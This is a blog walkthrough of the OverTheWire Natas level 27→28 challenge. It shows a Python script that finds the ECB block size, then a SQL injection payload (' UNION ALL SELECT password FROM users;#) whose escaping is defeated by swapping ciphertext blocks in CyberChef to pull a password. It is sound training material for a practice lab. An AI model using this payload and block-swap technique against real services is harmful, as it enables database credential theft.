<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="It was a pleasure to burn">

    <link rel="shortcut icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="/assets/css/main.min.css ">
    <link rel="canonical" href="/2021/06/01/natas27-28/">
    <link rel="alternate" type="application/rss+xml" title="Caminek" href="/feed.xml ">
    
    <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Natas Level 27 → Level 28 | Caminek</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Natas Level 27 → Level 28" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="It was a pleasure to burn" />
<meta property="og:description" content="It was a pleasure to burn" />
<link rel="canonical" href="/2021/06/01/natas27-28/" />
<meta property="og:url" content="/2021/06/01/natas27-28/" />
<meta property="og:site_name" content="Caminek" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-06-01T13:59:05-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Natas Level 27 → Level 28" />
<script type="application/ld+json">
{"@type":"BlogPosting","description":"It was a pleasure to burn","mainEntityOfPage":{"@type":"WebPage","@id":"/2021/06/01/natas27-28/"},"headline":"Natas Level 27 → Level 28","url":"/2021/06/01/natas27-28/","dateModified":"2021-06-01T13:59:05-04:00","datePublished":"2021-06-01T13:59:05-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->






</head>


  <body>

    <header id="top">
    <div class="wrapper">
        
            <img src="/assets/img/misc/avatar.png" alt="site.icon" width="32" height="32" style="vertical-align:middle"/>
        
        <a href="/" class="brand">Caminek</a>
        <small></small>
        <button id="headerMenu" class="menu"><i class="fa fa-bars"></i></button>
        <nav id="headerNav">
            <ul>
                <li>
                    
                    <a href="/">
                    
                        <i class="fa fa-home"></i>Home
                    </a>
                </li>

                
                    
                    <li>
                        
                        <a href="/series/">
                        
                            <i class="fa fa-book"></i>Series
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/archive/">
                        
                            <i class="fa fa-archive"></i>Archives
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/category/">
                        
                            <i class="fa fa-th-list"></i>Categories
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/tag/">
                        
                            <i class="fa fa-tags"></i>Tags
                        </a>
                    </li>
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
            </ul>
        </nav>
    </div>
</header>


        <div class="page clearfix" index>
    <div class="left">
        <h1>Natas Level 27 → Level 28</h1>
        <div class="label">

            <div class="label-card">
                <i class="fa fa-calendar"></i> 2021-06-01
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
            


<!-- <span class="point">•</span> -->
<span class="categories">
  <i class="fa fa-th-list"></i>
  
    
        <a href="/category/#ctf" title="Category: ctf" rel="category">ctf</a>&nbsp;
    
        <a href="/category/#wargames" title="Category: wargames" rel="category">wargames</a>&nbsp;
    
        <a href="/category/#web-security" title="Category: web-security" rel="category">web-security</a>
    
  

  <!-- <span class="point">•</span> -->
</span>


            </div>

            <div class="label-card">
            
<!-- <span class="point">•</span> -->
<span class="pageTag">
  <i class="fa fa-tags"></i>
  
    
        <!--a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a-->
        <a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a>&nbsp;
    
        <!--a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a-->
        <a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a>&nbsp;
    
        <!--a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a-->
        <a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a>&nbsp;
    
        <!--a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a-->
        <a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a>
    
  

</span>

            </div>

        </div>
        <hr>
        <article itemscope itemtype="http://schema.org/BlogPosting">
            <h2 id="level-goal">Level Goal</h2>
<p>Excluding the URL and username, the Level Goal section is blank for the Natas ctf.</p>

<h2 id="solution">Solution</h2>
<p>This level provides us with a form to search a joke database. No code is provided. There’s little for us to do at this point but play with the search. Let’s do that.</p>

<p>Playing around with search we see:</p>
<ul>
  <li>A quick search for a single- and double-quote, shows that the code is sanitizing inputs.</li>
  <li>Leaving the form blank returns jokes.</li>
  <li>The query string is in base64.</li>
  <li>Decoding the URL results in non-human-readable characters.</li>
  <li>Removing the URL Encoded equals sign (%3D) from the end of the URL has no effect on the site</li>
  <li>Removing the character after the equal sign produces the following error:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  Incorrect amount of PKCS#7 padding for blocksize
</code></pre></div>    </div>
  </li>
</ul>

<p>The error message is interesting. It tells us that we’re dealing with a <a href="https://en.wikipedia.org/wiki/Padding_(cryptography)">block</a> <a href="https://en.wikipedia.org/wiki/Block_cipher">cipher</a>. Let’s determine the block size.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python
</span><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="kn">from</span> <span class="nn">requests.auth</span> <span class="kn">import</span> <span class="n">HTTPBasicAuth</span>

<span class="n">password</span> <span class="o">=</span> <span class="s">'J------------------------------F'</span>

<span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">Session</span><span class="p">()</span>
<span class="n">auth</span> <span class="o">=</span> <span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas28'</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">'http://natas28.natas.labs.overthewire.org/index.php?query='</span>


<span class="k">def</span> <span class="nf">gcf</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">while</span> <span class="n">y</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="n">y</span><span class="p">,</span> <span class="nb">abs</span><span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">y</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">x</span>


<span class="n">last_bytes</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">nibbles</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">128</span><span class="p">):</span>
    <span class="n">q</span> <span class="o">=</span> <span class="n">url</span> <span class="o">+</span> <span class="s">"a"</span> <span class="o">*</span> <span class="n">i</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="o">=</span><span class="n">q</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">auth</span><span class="p">)</span>
    <span class="n">url_enc</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">url</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">url_dec</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">parse</span><span class="p">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">url_enc</span><span class="p">)</span>
    <span class="n">b64_dec</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">url_dec</span><span class="p">)</span>
    <span class="n">enc_hex</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">hexlify</span><span class="p">(</span><span class="n">b64_dec</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf8'</span><span class="p">)</span>

    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">enc_hex</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">nibbles</span><span class="p">:</span>
        <span class="n">nibbles</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">enc_hex</span><span class="p">)</span>
        <span class="nb">bytes</span> <span class="o">=</span> <span class="n">nibbles</span> <span class="o">//</span> <span class="mi">2</span>
        <span class="n">blocksize</span> <span class="o">=</span> <span class="n">gcf</span><span class="p">(</span><span class="nb">bytes</span><span class="p">,</span> <span class="n">last_bytes</span><span class="p">)</span>
        <span class="n">last_bytes</span> <span class="o">=</span> <span class="nb">bytes</span>

        <span class="k">if</span> <span class="n">i</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">):</span> <span class="o">&gt;</span><span class="mi">3</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="nb">str</span><span class="p">(</span><span class="nb">bytes</span><span class="p">):</span> <span class="o">&gt;</span><span class="mi">3</span><span class="si">}</span><span class="s"> bytes   Block Size: </span><span class="si">{</span><span class="n">blocksize</span><span class="si">}</span><span class="s">   Blocks: </span><span class="si">{</span><span class="nb">bytes</span><span class="o">//</span><span class="n">blocksize</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">):</span> <span class="o">&gt;</span><span class="mi">3</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="nb">str</span><span class="p">(</span><span class="nb">bytes</span><span class="p">):</span> <span class="o">&gt;</span><span class="mi">3</span><span class="si">}</span><span class="s"> bytes'</span><span class="p">)</span>
</code></pre></div></div>

<p>The above script will start by contacting the natas28 site and make a query with a single ‘a’. It will store the length of this value and repeat the search, adding an additional ‘a’ each time. It will do this 128 times. When the length of the query string has changed from the previous value, it will be output and the block size calculated by taking the <a href="https://en.wikipedia.org/wiki/Greatest_common_factor">greatest common factor</a> between the byte sizes.</p>

<p>Below are the results:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  1:  80 bytes
 13:  96 bytes   Block Size: 16   Blocks: 6
 29: 112 bytes   Block Size: 16   Blocks: 7
 45: 128 bytes   Block Size: 16   Blocks: 8
 61: 144 bytes   Block Size: 16   Blocks: 9
 77: 160 bytes   Block Size: 16   Blocks: 10
 93: 176 bytes   Block Size: 16   Blocks: 11
109: 192 bytes   Block Size: 16   Blocks: 12
125: 208 bytes   Block Size: 16   Blocks: 13
</code></pre></div></div>

<p>If we look at the hexadecimal representation of blocks, we see the following:</p>

<ul>
  <li>The first two blocks are identical regardless of how many a’s we search for.
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  1be82511a7ba5bfd578c0eef466db59c
  dc84728fdcf89d93751d10a7c75c8cf2
</code></pre></div>    </div>
  </li>
  <li>For queries with less than 10 a’s the third block varies. Otherwise it always appears as below:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  c0872dee8bc90b1156913b08a223a39e
</code></pre></div>    </div>
  </li>
  <li>For each new block greater than 6, we see the following repeating pattern:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  b39038c28df79b65d26151df58f7eaa3
</code></pre></div>    </div>
  </li>
</ul>

<h3 id="ecb">ECB</h3>
<p>Searching for “16 byte block cipher no salt” on <a href="https://duckduckgo.com/?q=16+byte+block+cipher+no+salt">DuckDuckGo</a> returns a post from <a href="https://stackoverflow.com/questions/587301/aes-encryption-of-16-bytes-without-salt/587384#587384">Stack Overflow</a> that suggests ECB or Electronic CodeBook might be what we’re dealing with. It also mentions that it’s not secure.</p>

<p>The article, <a href="https://www.sciencedirect.com/topics/computer-science/electronic-code-book">An Introduction To Cryptography</a> on <a href="https://www.sciencedirect.com">ScienceDirect.com</a> states the following:</p>

<blockquote>
  <p>The Electronic Code Book (ECB) mode uses simple substitution, making it one of the easiest and fastest algorithms to implement. The input plaintext is broken into a number of blocks, and encrypted individually using the key. This allows each encrypted block to be decrypted individually. Encrypting the same block twice will result in the same ciphertext being returned twice.</p>
</blockquote>

<p>This definition matches exactly what we’re seeing.</p>

<p>Another quick look on DDG for <strong>ecb reverse key</strong> led to <a href="https://crypto.stackexchange.com/questions/63883/is-it-possible-to-find-the-key-for-aes-ecb-if-i-have-a-list-of-plaintext-and-cor#63889">another StackOverflow post</a> that states this is mathematically impossible.</p>

<p>While we can’t reverse the key, we can leverage the weakness in ECB and the fact that the site encrypts any query made of it with the key. We can use the site to encrypt our payload, we just need to carefully craft our query to do so.</p>

<h3 id="back-for-the-attack">Back for the Attack</h3>
<p>Looking back over our notes, we see four things that we need for the attack:</p>
<ol>
  <li>Quotes are escaped</li>
  <li>For queries with less than 10 a’s, the third block varies.</li>
  <li>Blocks are decrypted individually</li>
  <li>Encrypting the same block twice will result in the same ciphertext being returned twice.</li>
</ol>

<p>Excluding the first two blocks, we can use any other block for the attack. I’m going to use the third block as using another block offers no advantage. As we’ll see, it’s more advantageous to use the third since we won’t have to perform any additional calculations.</p>

<p>The attack string we want to use is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>' UNION ALL SELECT password FROM users;#
</code></pre></div></div>

<p>If we were to try entering in just that key, it would fail due to the single being escaped. Since we cannot prevent the single quote from being escaped, we’ll need to find another way to deal with it. This is where numbers two and three come into play.</p>

<p>Since blocks are decrypted individually, we should be able to start our attack in a new block and have it processed. In fact, we can but since the payload starts with a single quote, the site will append a slash nullifying the code. We cannot remove the slash due to ECB. Instead of starting with ten a’s, we can start with nine. This would place the slash in Block 3 and the payload, starting with the single quote in Block 4. The new payload would look like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaaaaaaaa' UNION ALL SELECT password FROM users;#
</code></pre></div></div>

<p>Enter that into the search and… it fails.</p>

<h3 id="that-was-a-terrible-prize">That was a terrible prize</h3>
<p>The reason this fails is that while the slash is in another block, it still exists. Why move the slash then? Because of the final point, encrypting the same block twice will result in the same ciphertext being returned twice.</p>

<p>We know each block contains 16 bytes. We know that 10 a’s fills the block. This means there are 6 bytes of padding, noted below with a question mark.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>??????aaaaaaaaaa
</code></pre></div></div>

<p>We don’t know what those characters are or care. We do know that the above is encrypts to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>c0872dee8bc90b1156913b08a223a39e
</code></pre></div></div>

<p>By moving the slash up one line we end up with this pattern:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>??????aaaaaaaaa\
</code></pre></div></div>

<p>While this will cause the block encryption to appear very different, we don’t care. We’re going to completely replace this version of Block 3, with the original one. We can do this because given identical text, ECB will always return the same result. Meaning, we’re replacing <strong>??????aaaaaaaaa\</strong> with <strong>??????aaaaaaaaaa</strong>. By doing that we remove the slash added by the input sanitization, leaving the SQL vulnerable. To do this easily, we’ll use <a href="https://gchq.github.io/CyberChef/">CyberChef</a>.</p>

<h3 id="kitchen-stadium">Kitchen Stadium</h3>
<p>If you haven’t already, enter the following into the search:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaaaaaaaa' UNION ALL SELECT password FROM users;#
</code></pre></div></div>

<p>Copy the query string and head over to CyberChef. Enter the query string into the Input section. Add the following 3 “recipes” from the menu on the left, in order:</p>
<ul>
  <li>URL Decode</li>
  <li>From Base64
    <ul>
      <li>leave the defaults</li>
    </ul>
  </li>
  <li>To Hex
    <ul>
      <li>set Delimiter to: None</li>
      <li>set Bytes per line to: 16</li>
    </ul>
  </li>
</ul>

<p>Your page should look like <a href="https://gchq.github.io/CyberChef/#recipe=URL_Decode()From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',16)&amp;input=RyUyQmdsRWFlNlclMkYxWGpBN3ZSbTIxbk55RWNvJTJGYyUyQkoyVGRSMFFwOGRjalBJUjI3Z0s0Q1FsM0pjbXYlMkYwWUF4WU9WMDJHdTl6JTJGZEhSa1VVbG85RHlTUUI4bXRxNUhEMSUyRkJFZXNuVEF3aFBwWEEyeVMxSjB1aUV0R3dicGtNamJLZlNIbWFCN0hTbTFtQ0FWeVRWY0xnRHEzdG05dXNwcWM3Y2JOYUFRMHNURmMlM0Q">this</a>.</p>

<p>In the Output section, you’ll see all the blocks represented for the given query. Copy all the lines and either clear the information from this page, or open CyberChef in another tab.</p>

<p>Paste the blocks into the Input section.  Replace the third block, <strong>11dbb80ae02425dc9726bffd1803160e</strong>, with <strong>c0872dee8bc90b1156913b08a223a39e</strong>. Add the following three recipes:</p>
<ul>
  <li>From Hex</li>
  <li>To Base64</li>
  <li>URL Encode
    <ul>
      <li>check the Encode all special chars box</li>
    </ul>
  </li>
</ul>

<p>You should now see <a href="https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Base64('A-Za-z0-9%2B/%3D')URL_Encode(true)&amp;input=MWJlODI1MTFhN2JhNWJmZDU3OGMwZWVmNDY2ZGI1OWMKZGM4NDcyOGZkY2Y4OWQ5Mzc1MWQxMGE3Yzc1YzhjZjIKYzA4NzJkZWU4YmM5MGIxMTU2OTEzYjA4YTIyM2EzOWUKNTc0ZDg2YmJkY2ZmNzQ3NDY0NTE0OTY4ZjQzYzkyNDAKMWYyNmI2YWU0NzBmNWZjMTExZWIyNzRjMGMyMTNlOTUKYzBkYjI0YjUyNzRiYTIxMmQxYjA2ZTk5MGM4ZGIyOWYKNDg3OTlhMDdiMWQyOWI1OTgyMDE1YzkzNTVjMmUwMGUKYWRlZDliZGJhY2E2YTczYjcxYjM1YTAxMGQyYzRjNTc">this</a>.</p>

<p>Copy the Output text from the output section, and head back to the natas28 site.</p>

<p>If you closed the site earlier, you’ll need to perform a search. It doesn’t matter what, we simply need the URL to show the query parameter.  Delete everything to the right of the <strong>query=</strong>. Now paste in the text you got from CyberChef and press Enter. The site will present you with the password for natas29.</p>

        </article>
        <hr>
        

        <div class="post-recent">
    <div class="pre" style="display:inline-block; margin-top: 20px;">
        
        <p><i class="fa fa-arrow-left"></i> <a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a></p>
        
    </div>
    <div class="nex" style="display:inline-block; margin-top: 20px; float:right;">
        
        <p><a href="/2021/06/07/natas28-29/">Natas Level 28 → Level 29</a> <i class="fa fa-arrow-right"></i></p>
        
    </div>
</div>

        
        
        

    </div>
    <button class="anchor"><i class="fa fa-anchor"></i></button>
    <div class="right">
        <div class="wrap">
            
            <!-- Series -->
            <div class="side ">
                <div>
                    <i class="fa fa-book" aria-hidden="true"></i>
                    Series
                </div>
                <ul class="content-ul" srs>
                    
                    
                    

                    

                    
                    

                    
                        
                            <li>
                                
                                    <a href="/2021/06/07/natas29-30/">Natas Level 29 → Level 30</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/06/07/natas28-29/">Natas Level 28 → Level 29</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <strong>Natas Level 27 → Level 28</strong>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/05/31/natas25-26/">Natas Level 25 → Level 26</a>
                                
                            </li>
                        

                    
                </ul>
            </div>

            <!-- Recent -->
            <div class="side">
                <div>
                    <i class="fa fa-pencil-square-o" aria-hidden="true"></i>
                    Recent Posts
                </div>
                <ul class="content-ul" recent>
                    
                        <li><a href="/2021/06/07/natas31-32/">Natas Level 31 → Level 32</a></li>
                    
                        <li><a href="/2021/06/07/natas30-31/">Natas Level 30 → Level 31</a></li>
                    
                        <li><a href="/2021/06/07/natas29-30/">Natas Level 29 → Level 30</a></li>
                    
                        <li><a href="/2021/06/07/natas28-29/">Natas Level 28 → Level 29</a></li>
                    
                        <li><a href="/2021/06/01/natas27-28/">Natas Level 27 → Level 28</a></li>
                    
                </ul>
            </div>
            
            <!-- Content -->
            <div class="side ">
                <div>
                    <i class="fa fa-th-list"></i>
                    Categories
                </div>
                <ul class="content-ul" cate>
                    
                    <li>
                        <a href="/category/#reverse-engineering" class="categories-list-item" cate="reverse-engineering">
                            <span class="name">
                                reverse-engineering
                            </span>
                            <span class="badge">13</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#x86-64" class="categories-list-item" cate="x86-64">
                            <span class="name">
                                x86-64
                            </span>
                            <span class="badge">8</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#ctf" class="categories-list-item" cate="ctf">
                            <span class="name">
                                ctf
                            </span>
                            <span class="badge">73</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#wargames" class="categories-list-item" cate="wargames">
                            <span class="name">
                                wargames
                            </span>
                            <span class="badge">68</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#linux" class="categories-list-item" cate="linux">
                            <span class="name">
                                linux
                            </span>
                            <span class="badge">35</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#web-security" class="categories-list-item" cate="web-security">
                            <span class="name">
                                web-security
                            </span>
                            <span class="badge">33</span>
                        </a>
                    </li>
                    
                </ul>
            </div>

            <!-- Tag Cloud -->
            
        </div>
    </div>
</div>
<script>
/**
 * target _blank
 */
(function() {
    var aTags = document.querySelectorAll('article a:not([id])')
    for (var i = 0; i < aTags.length; i++) {
        aTags[i].setAttribute('target', '_blank')
    }
}());
</script>
<!-- <script src="/assets/js/pageContent.js " charset="utf-8"></script> -->


    <footer class="site-footer">


    <div class="wrapper">

        <p class="description">
            
        </p>
        <p class="contact">
            Find me on: 
            <a href="https://github.com/caminek" title="GitHub"><i class="fa fa-github" aria-hidden="true"></i></a> 
             
        </p>
        <p class="power">
            <span>
                Site powered by <a href="https://jekyllrb.com/">Jekyll</a> & <a href="https://pages.github.com/">Github Pages</a>.
            </span>
            <span>
                Theme designed by <a href="https://github.com/Gaohaoyang">HyG</a>, and modified by <a href="https://github.com/caminek">caminek</a>.
            </span>
        </p>
    </div>
</footer>

    <div class="back-to-top">
    <a href="#top" data-scroll>
        <i class="fa fa-arrow-up" aria-hidden="true"></i>
    </a>
</div>

    <!-- <script src=" /assets/js/main.js " charset="utf-8"></script>
    <script src=" /assets/js/smooth-scroll.min.js " charset="utf-8"></script> -->
    <script src=" /assets/js/all.js " charset="utf-8"></script>
    <script type="text/javascript">
      smoothScroll.init({
        speed: 500, // Integer. How fast to complete the scroll in milliseconds
        easing: 'easeInOutCubic', // Easing pattern to use
        offset: 20, // Integer. How far to offset the scrolling anchor location in pixels
      });
    </script>
    <!-- <script src=" /assets/js/scroll.min.js " charset="utf-8"></script> -->
  </body>

</html>
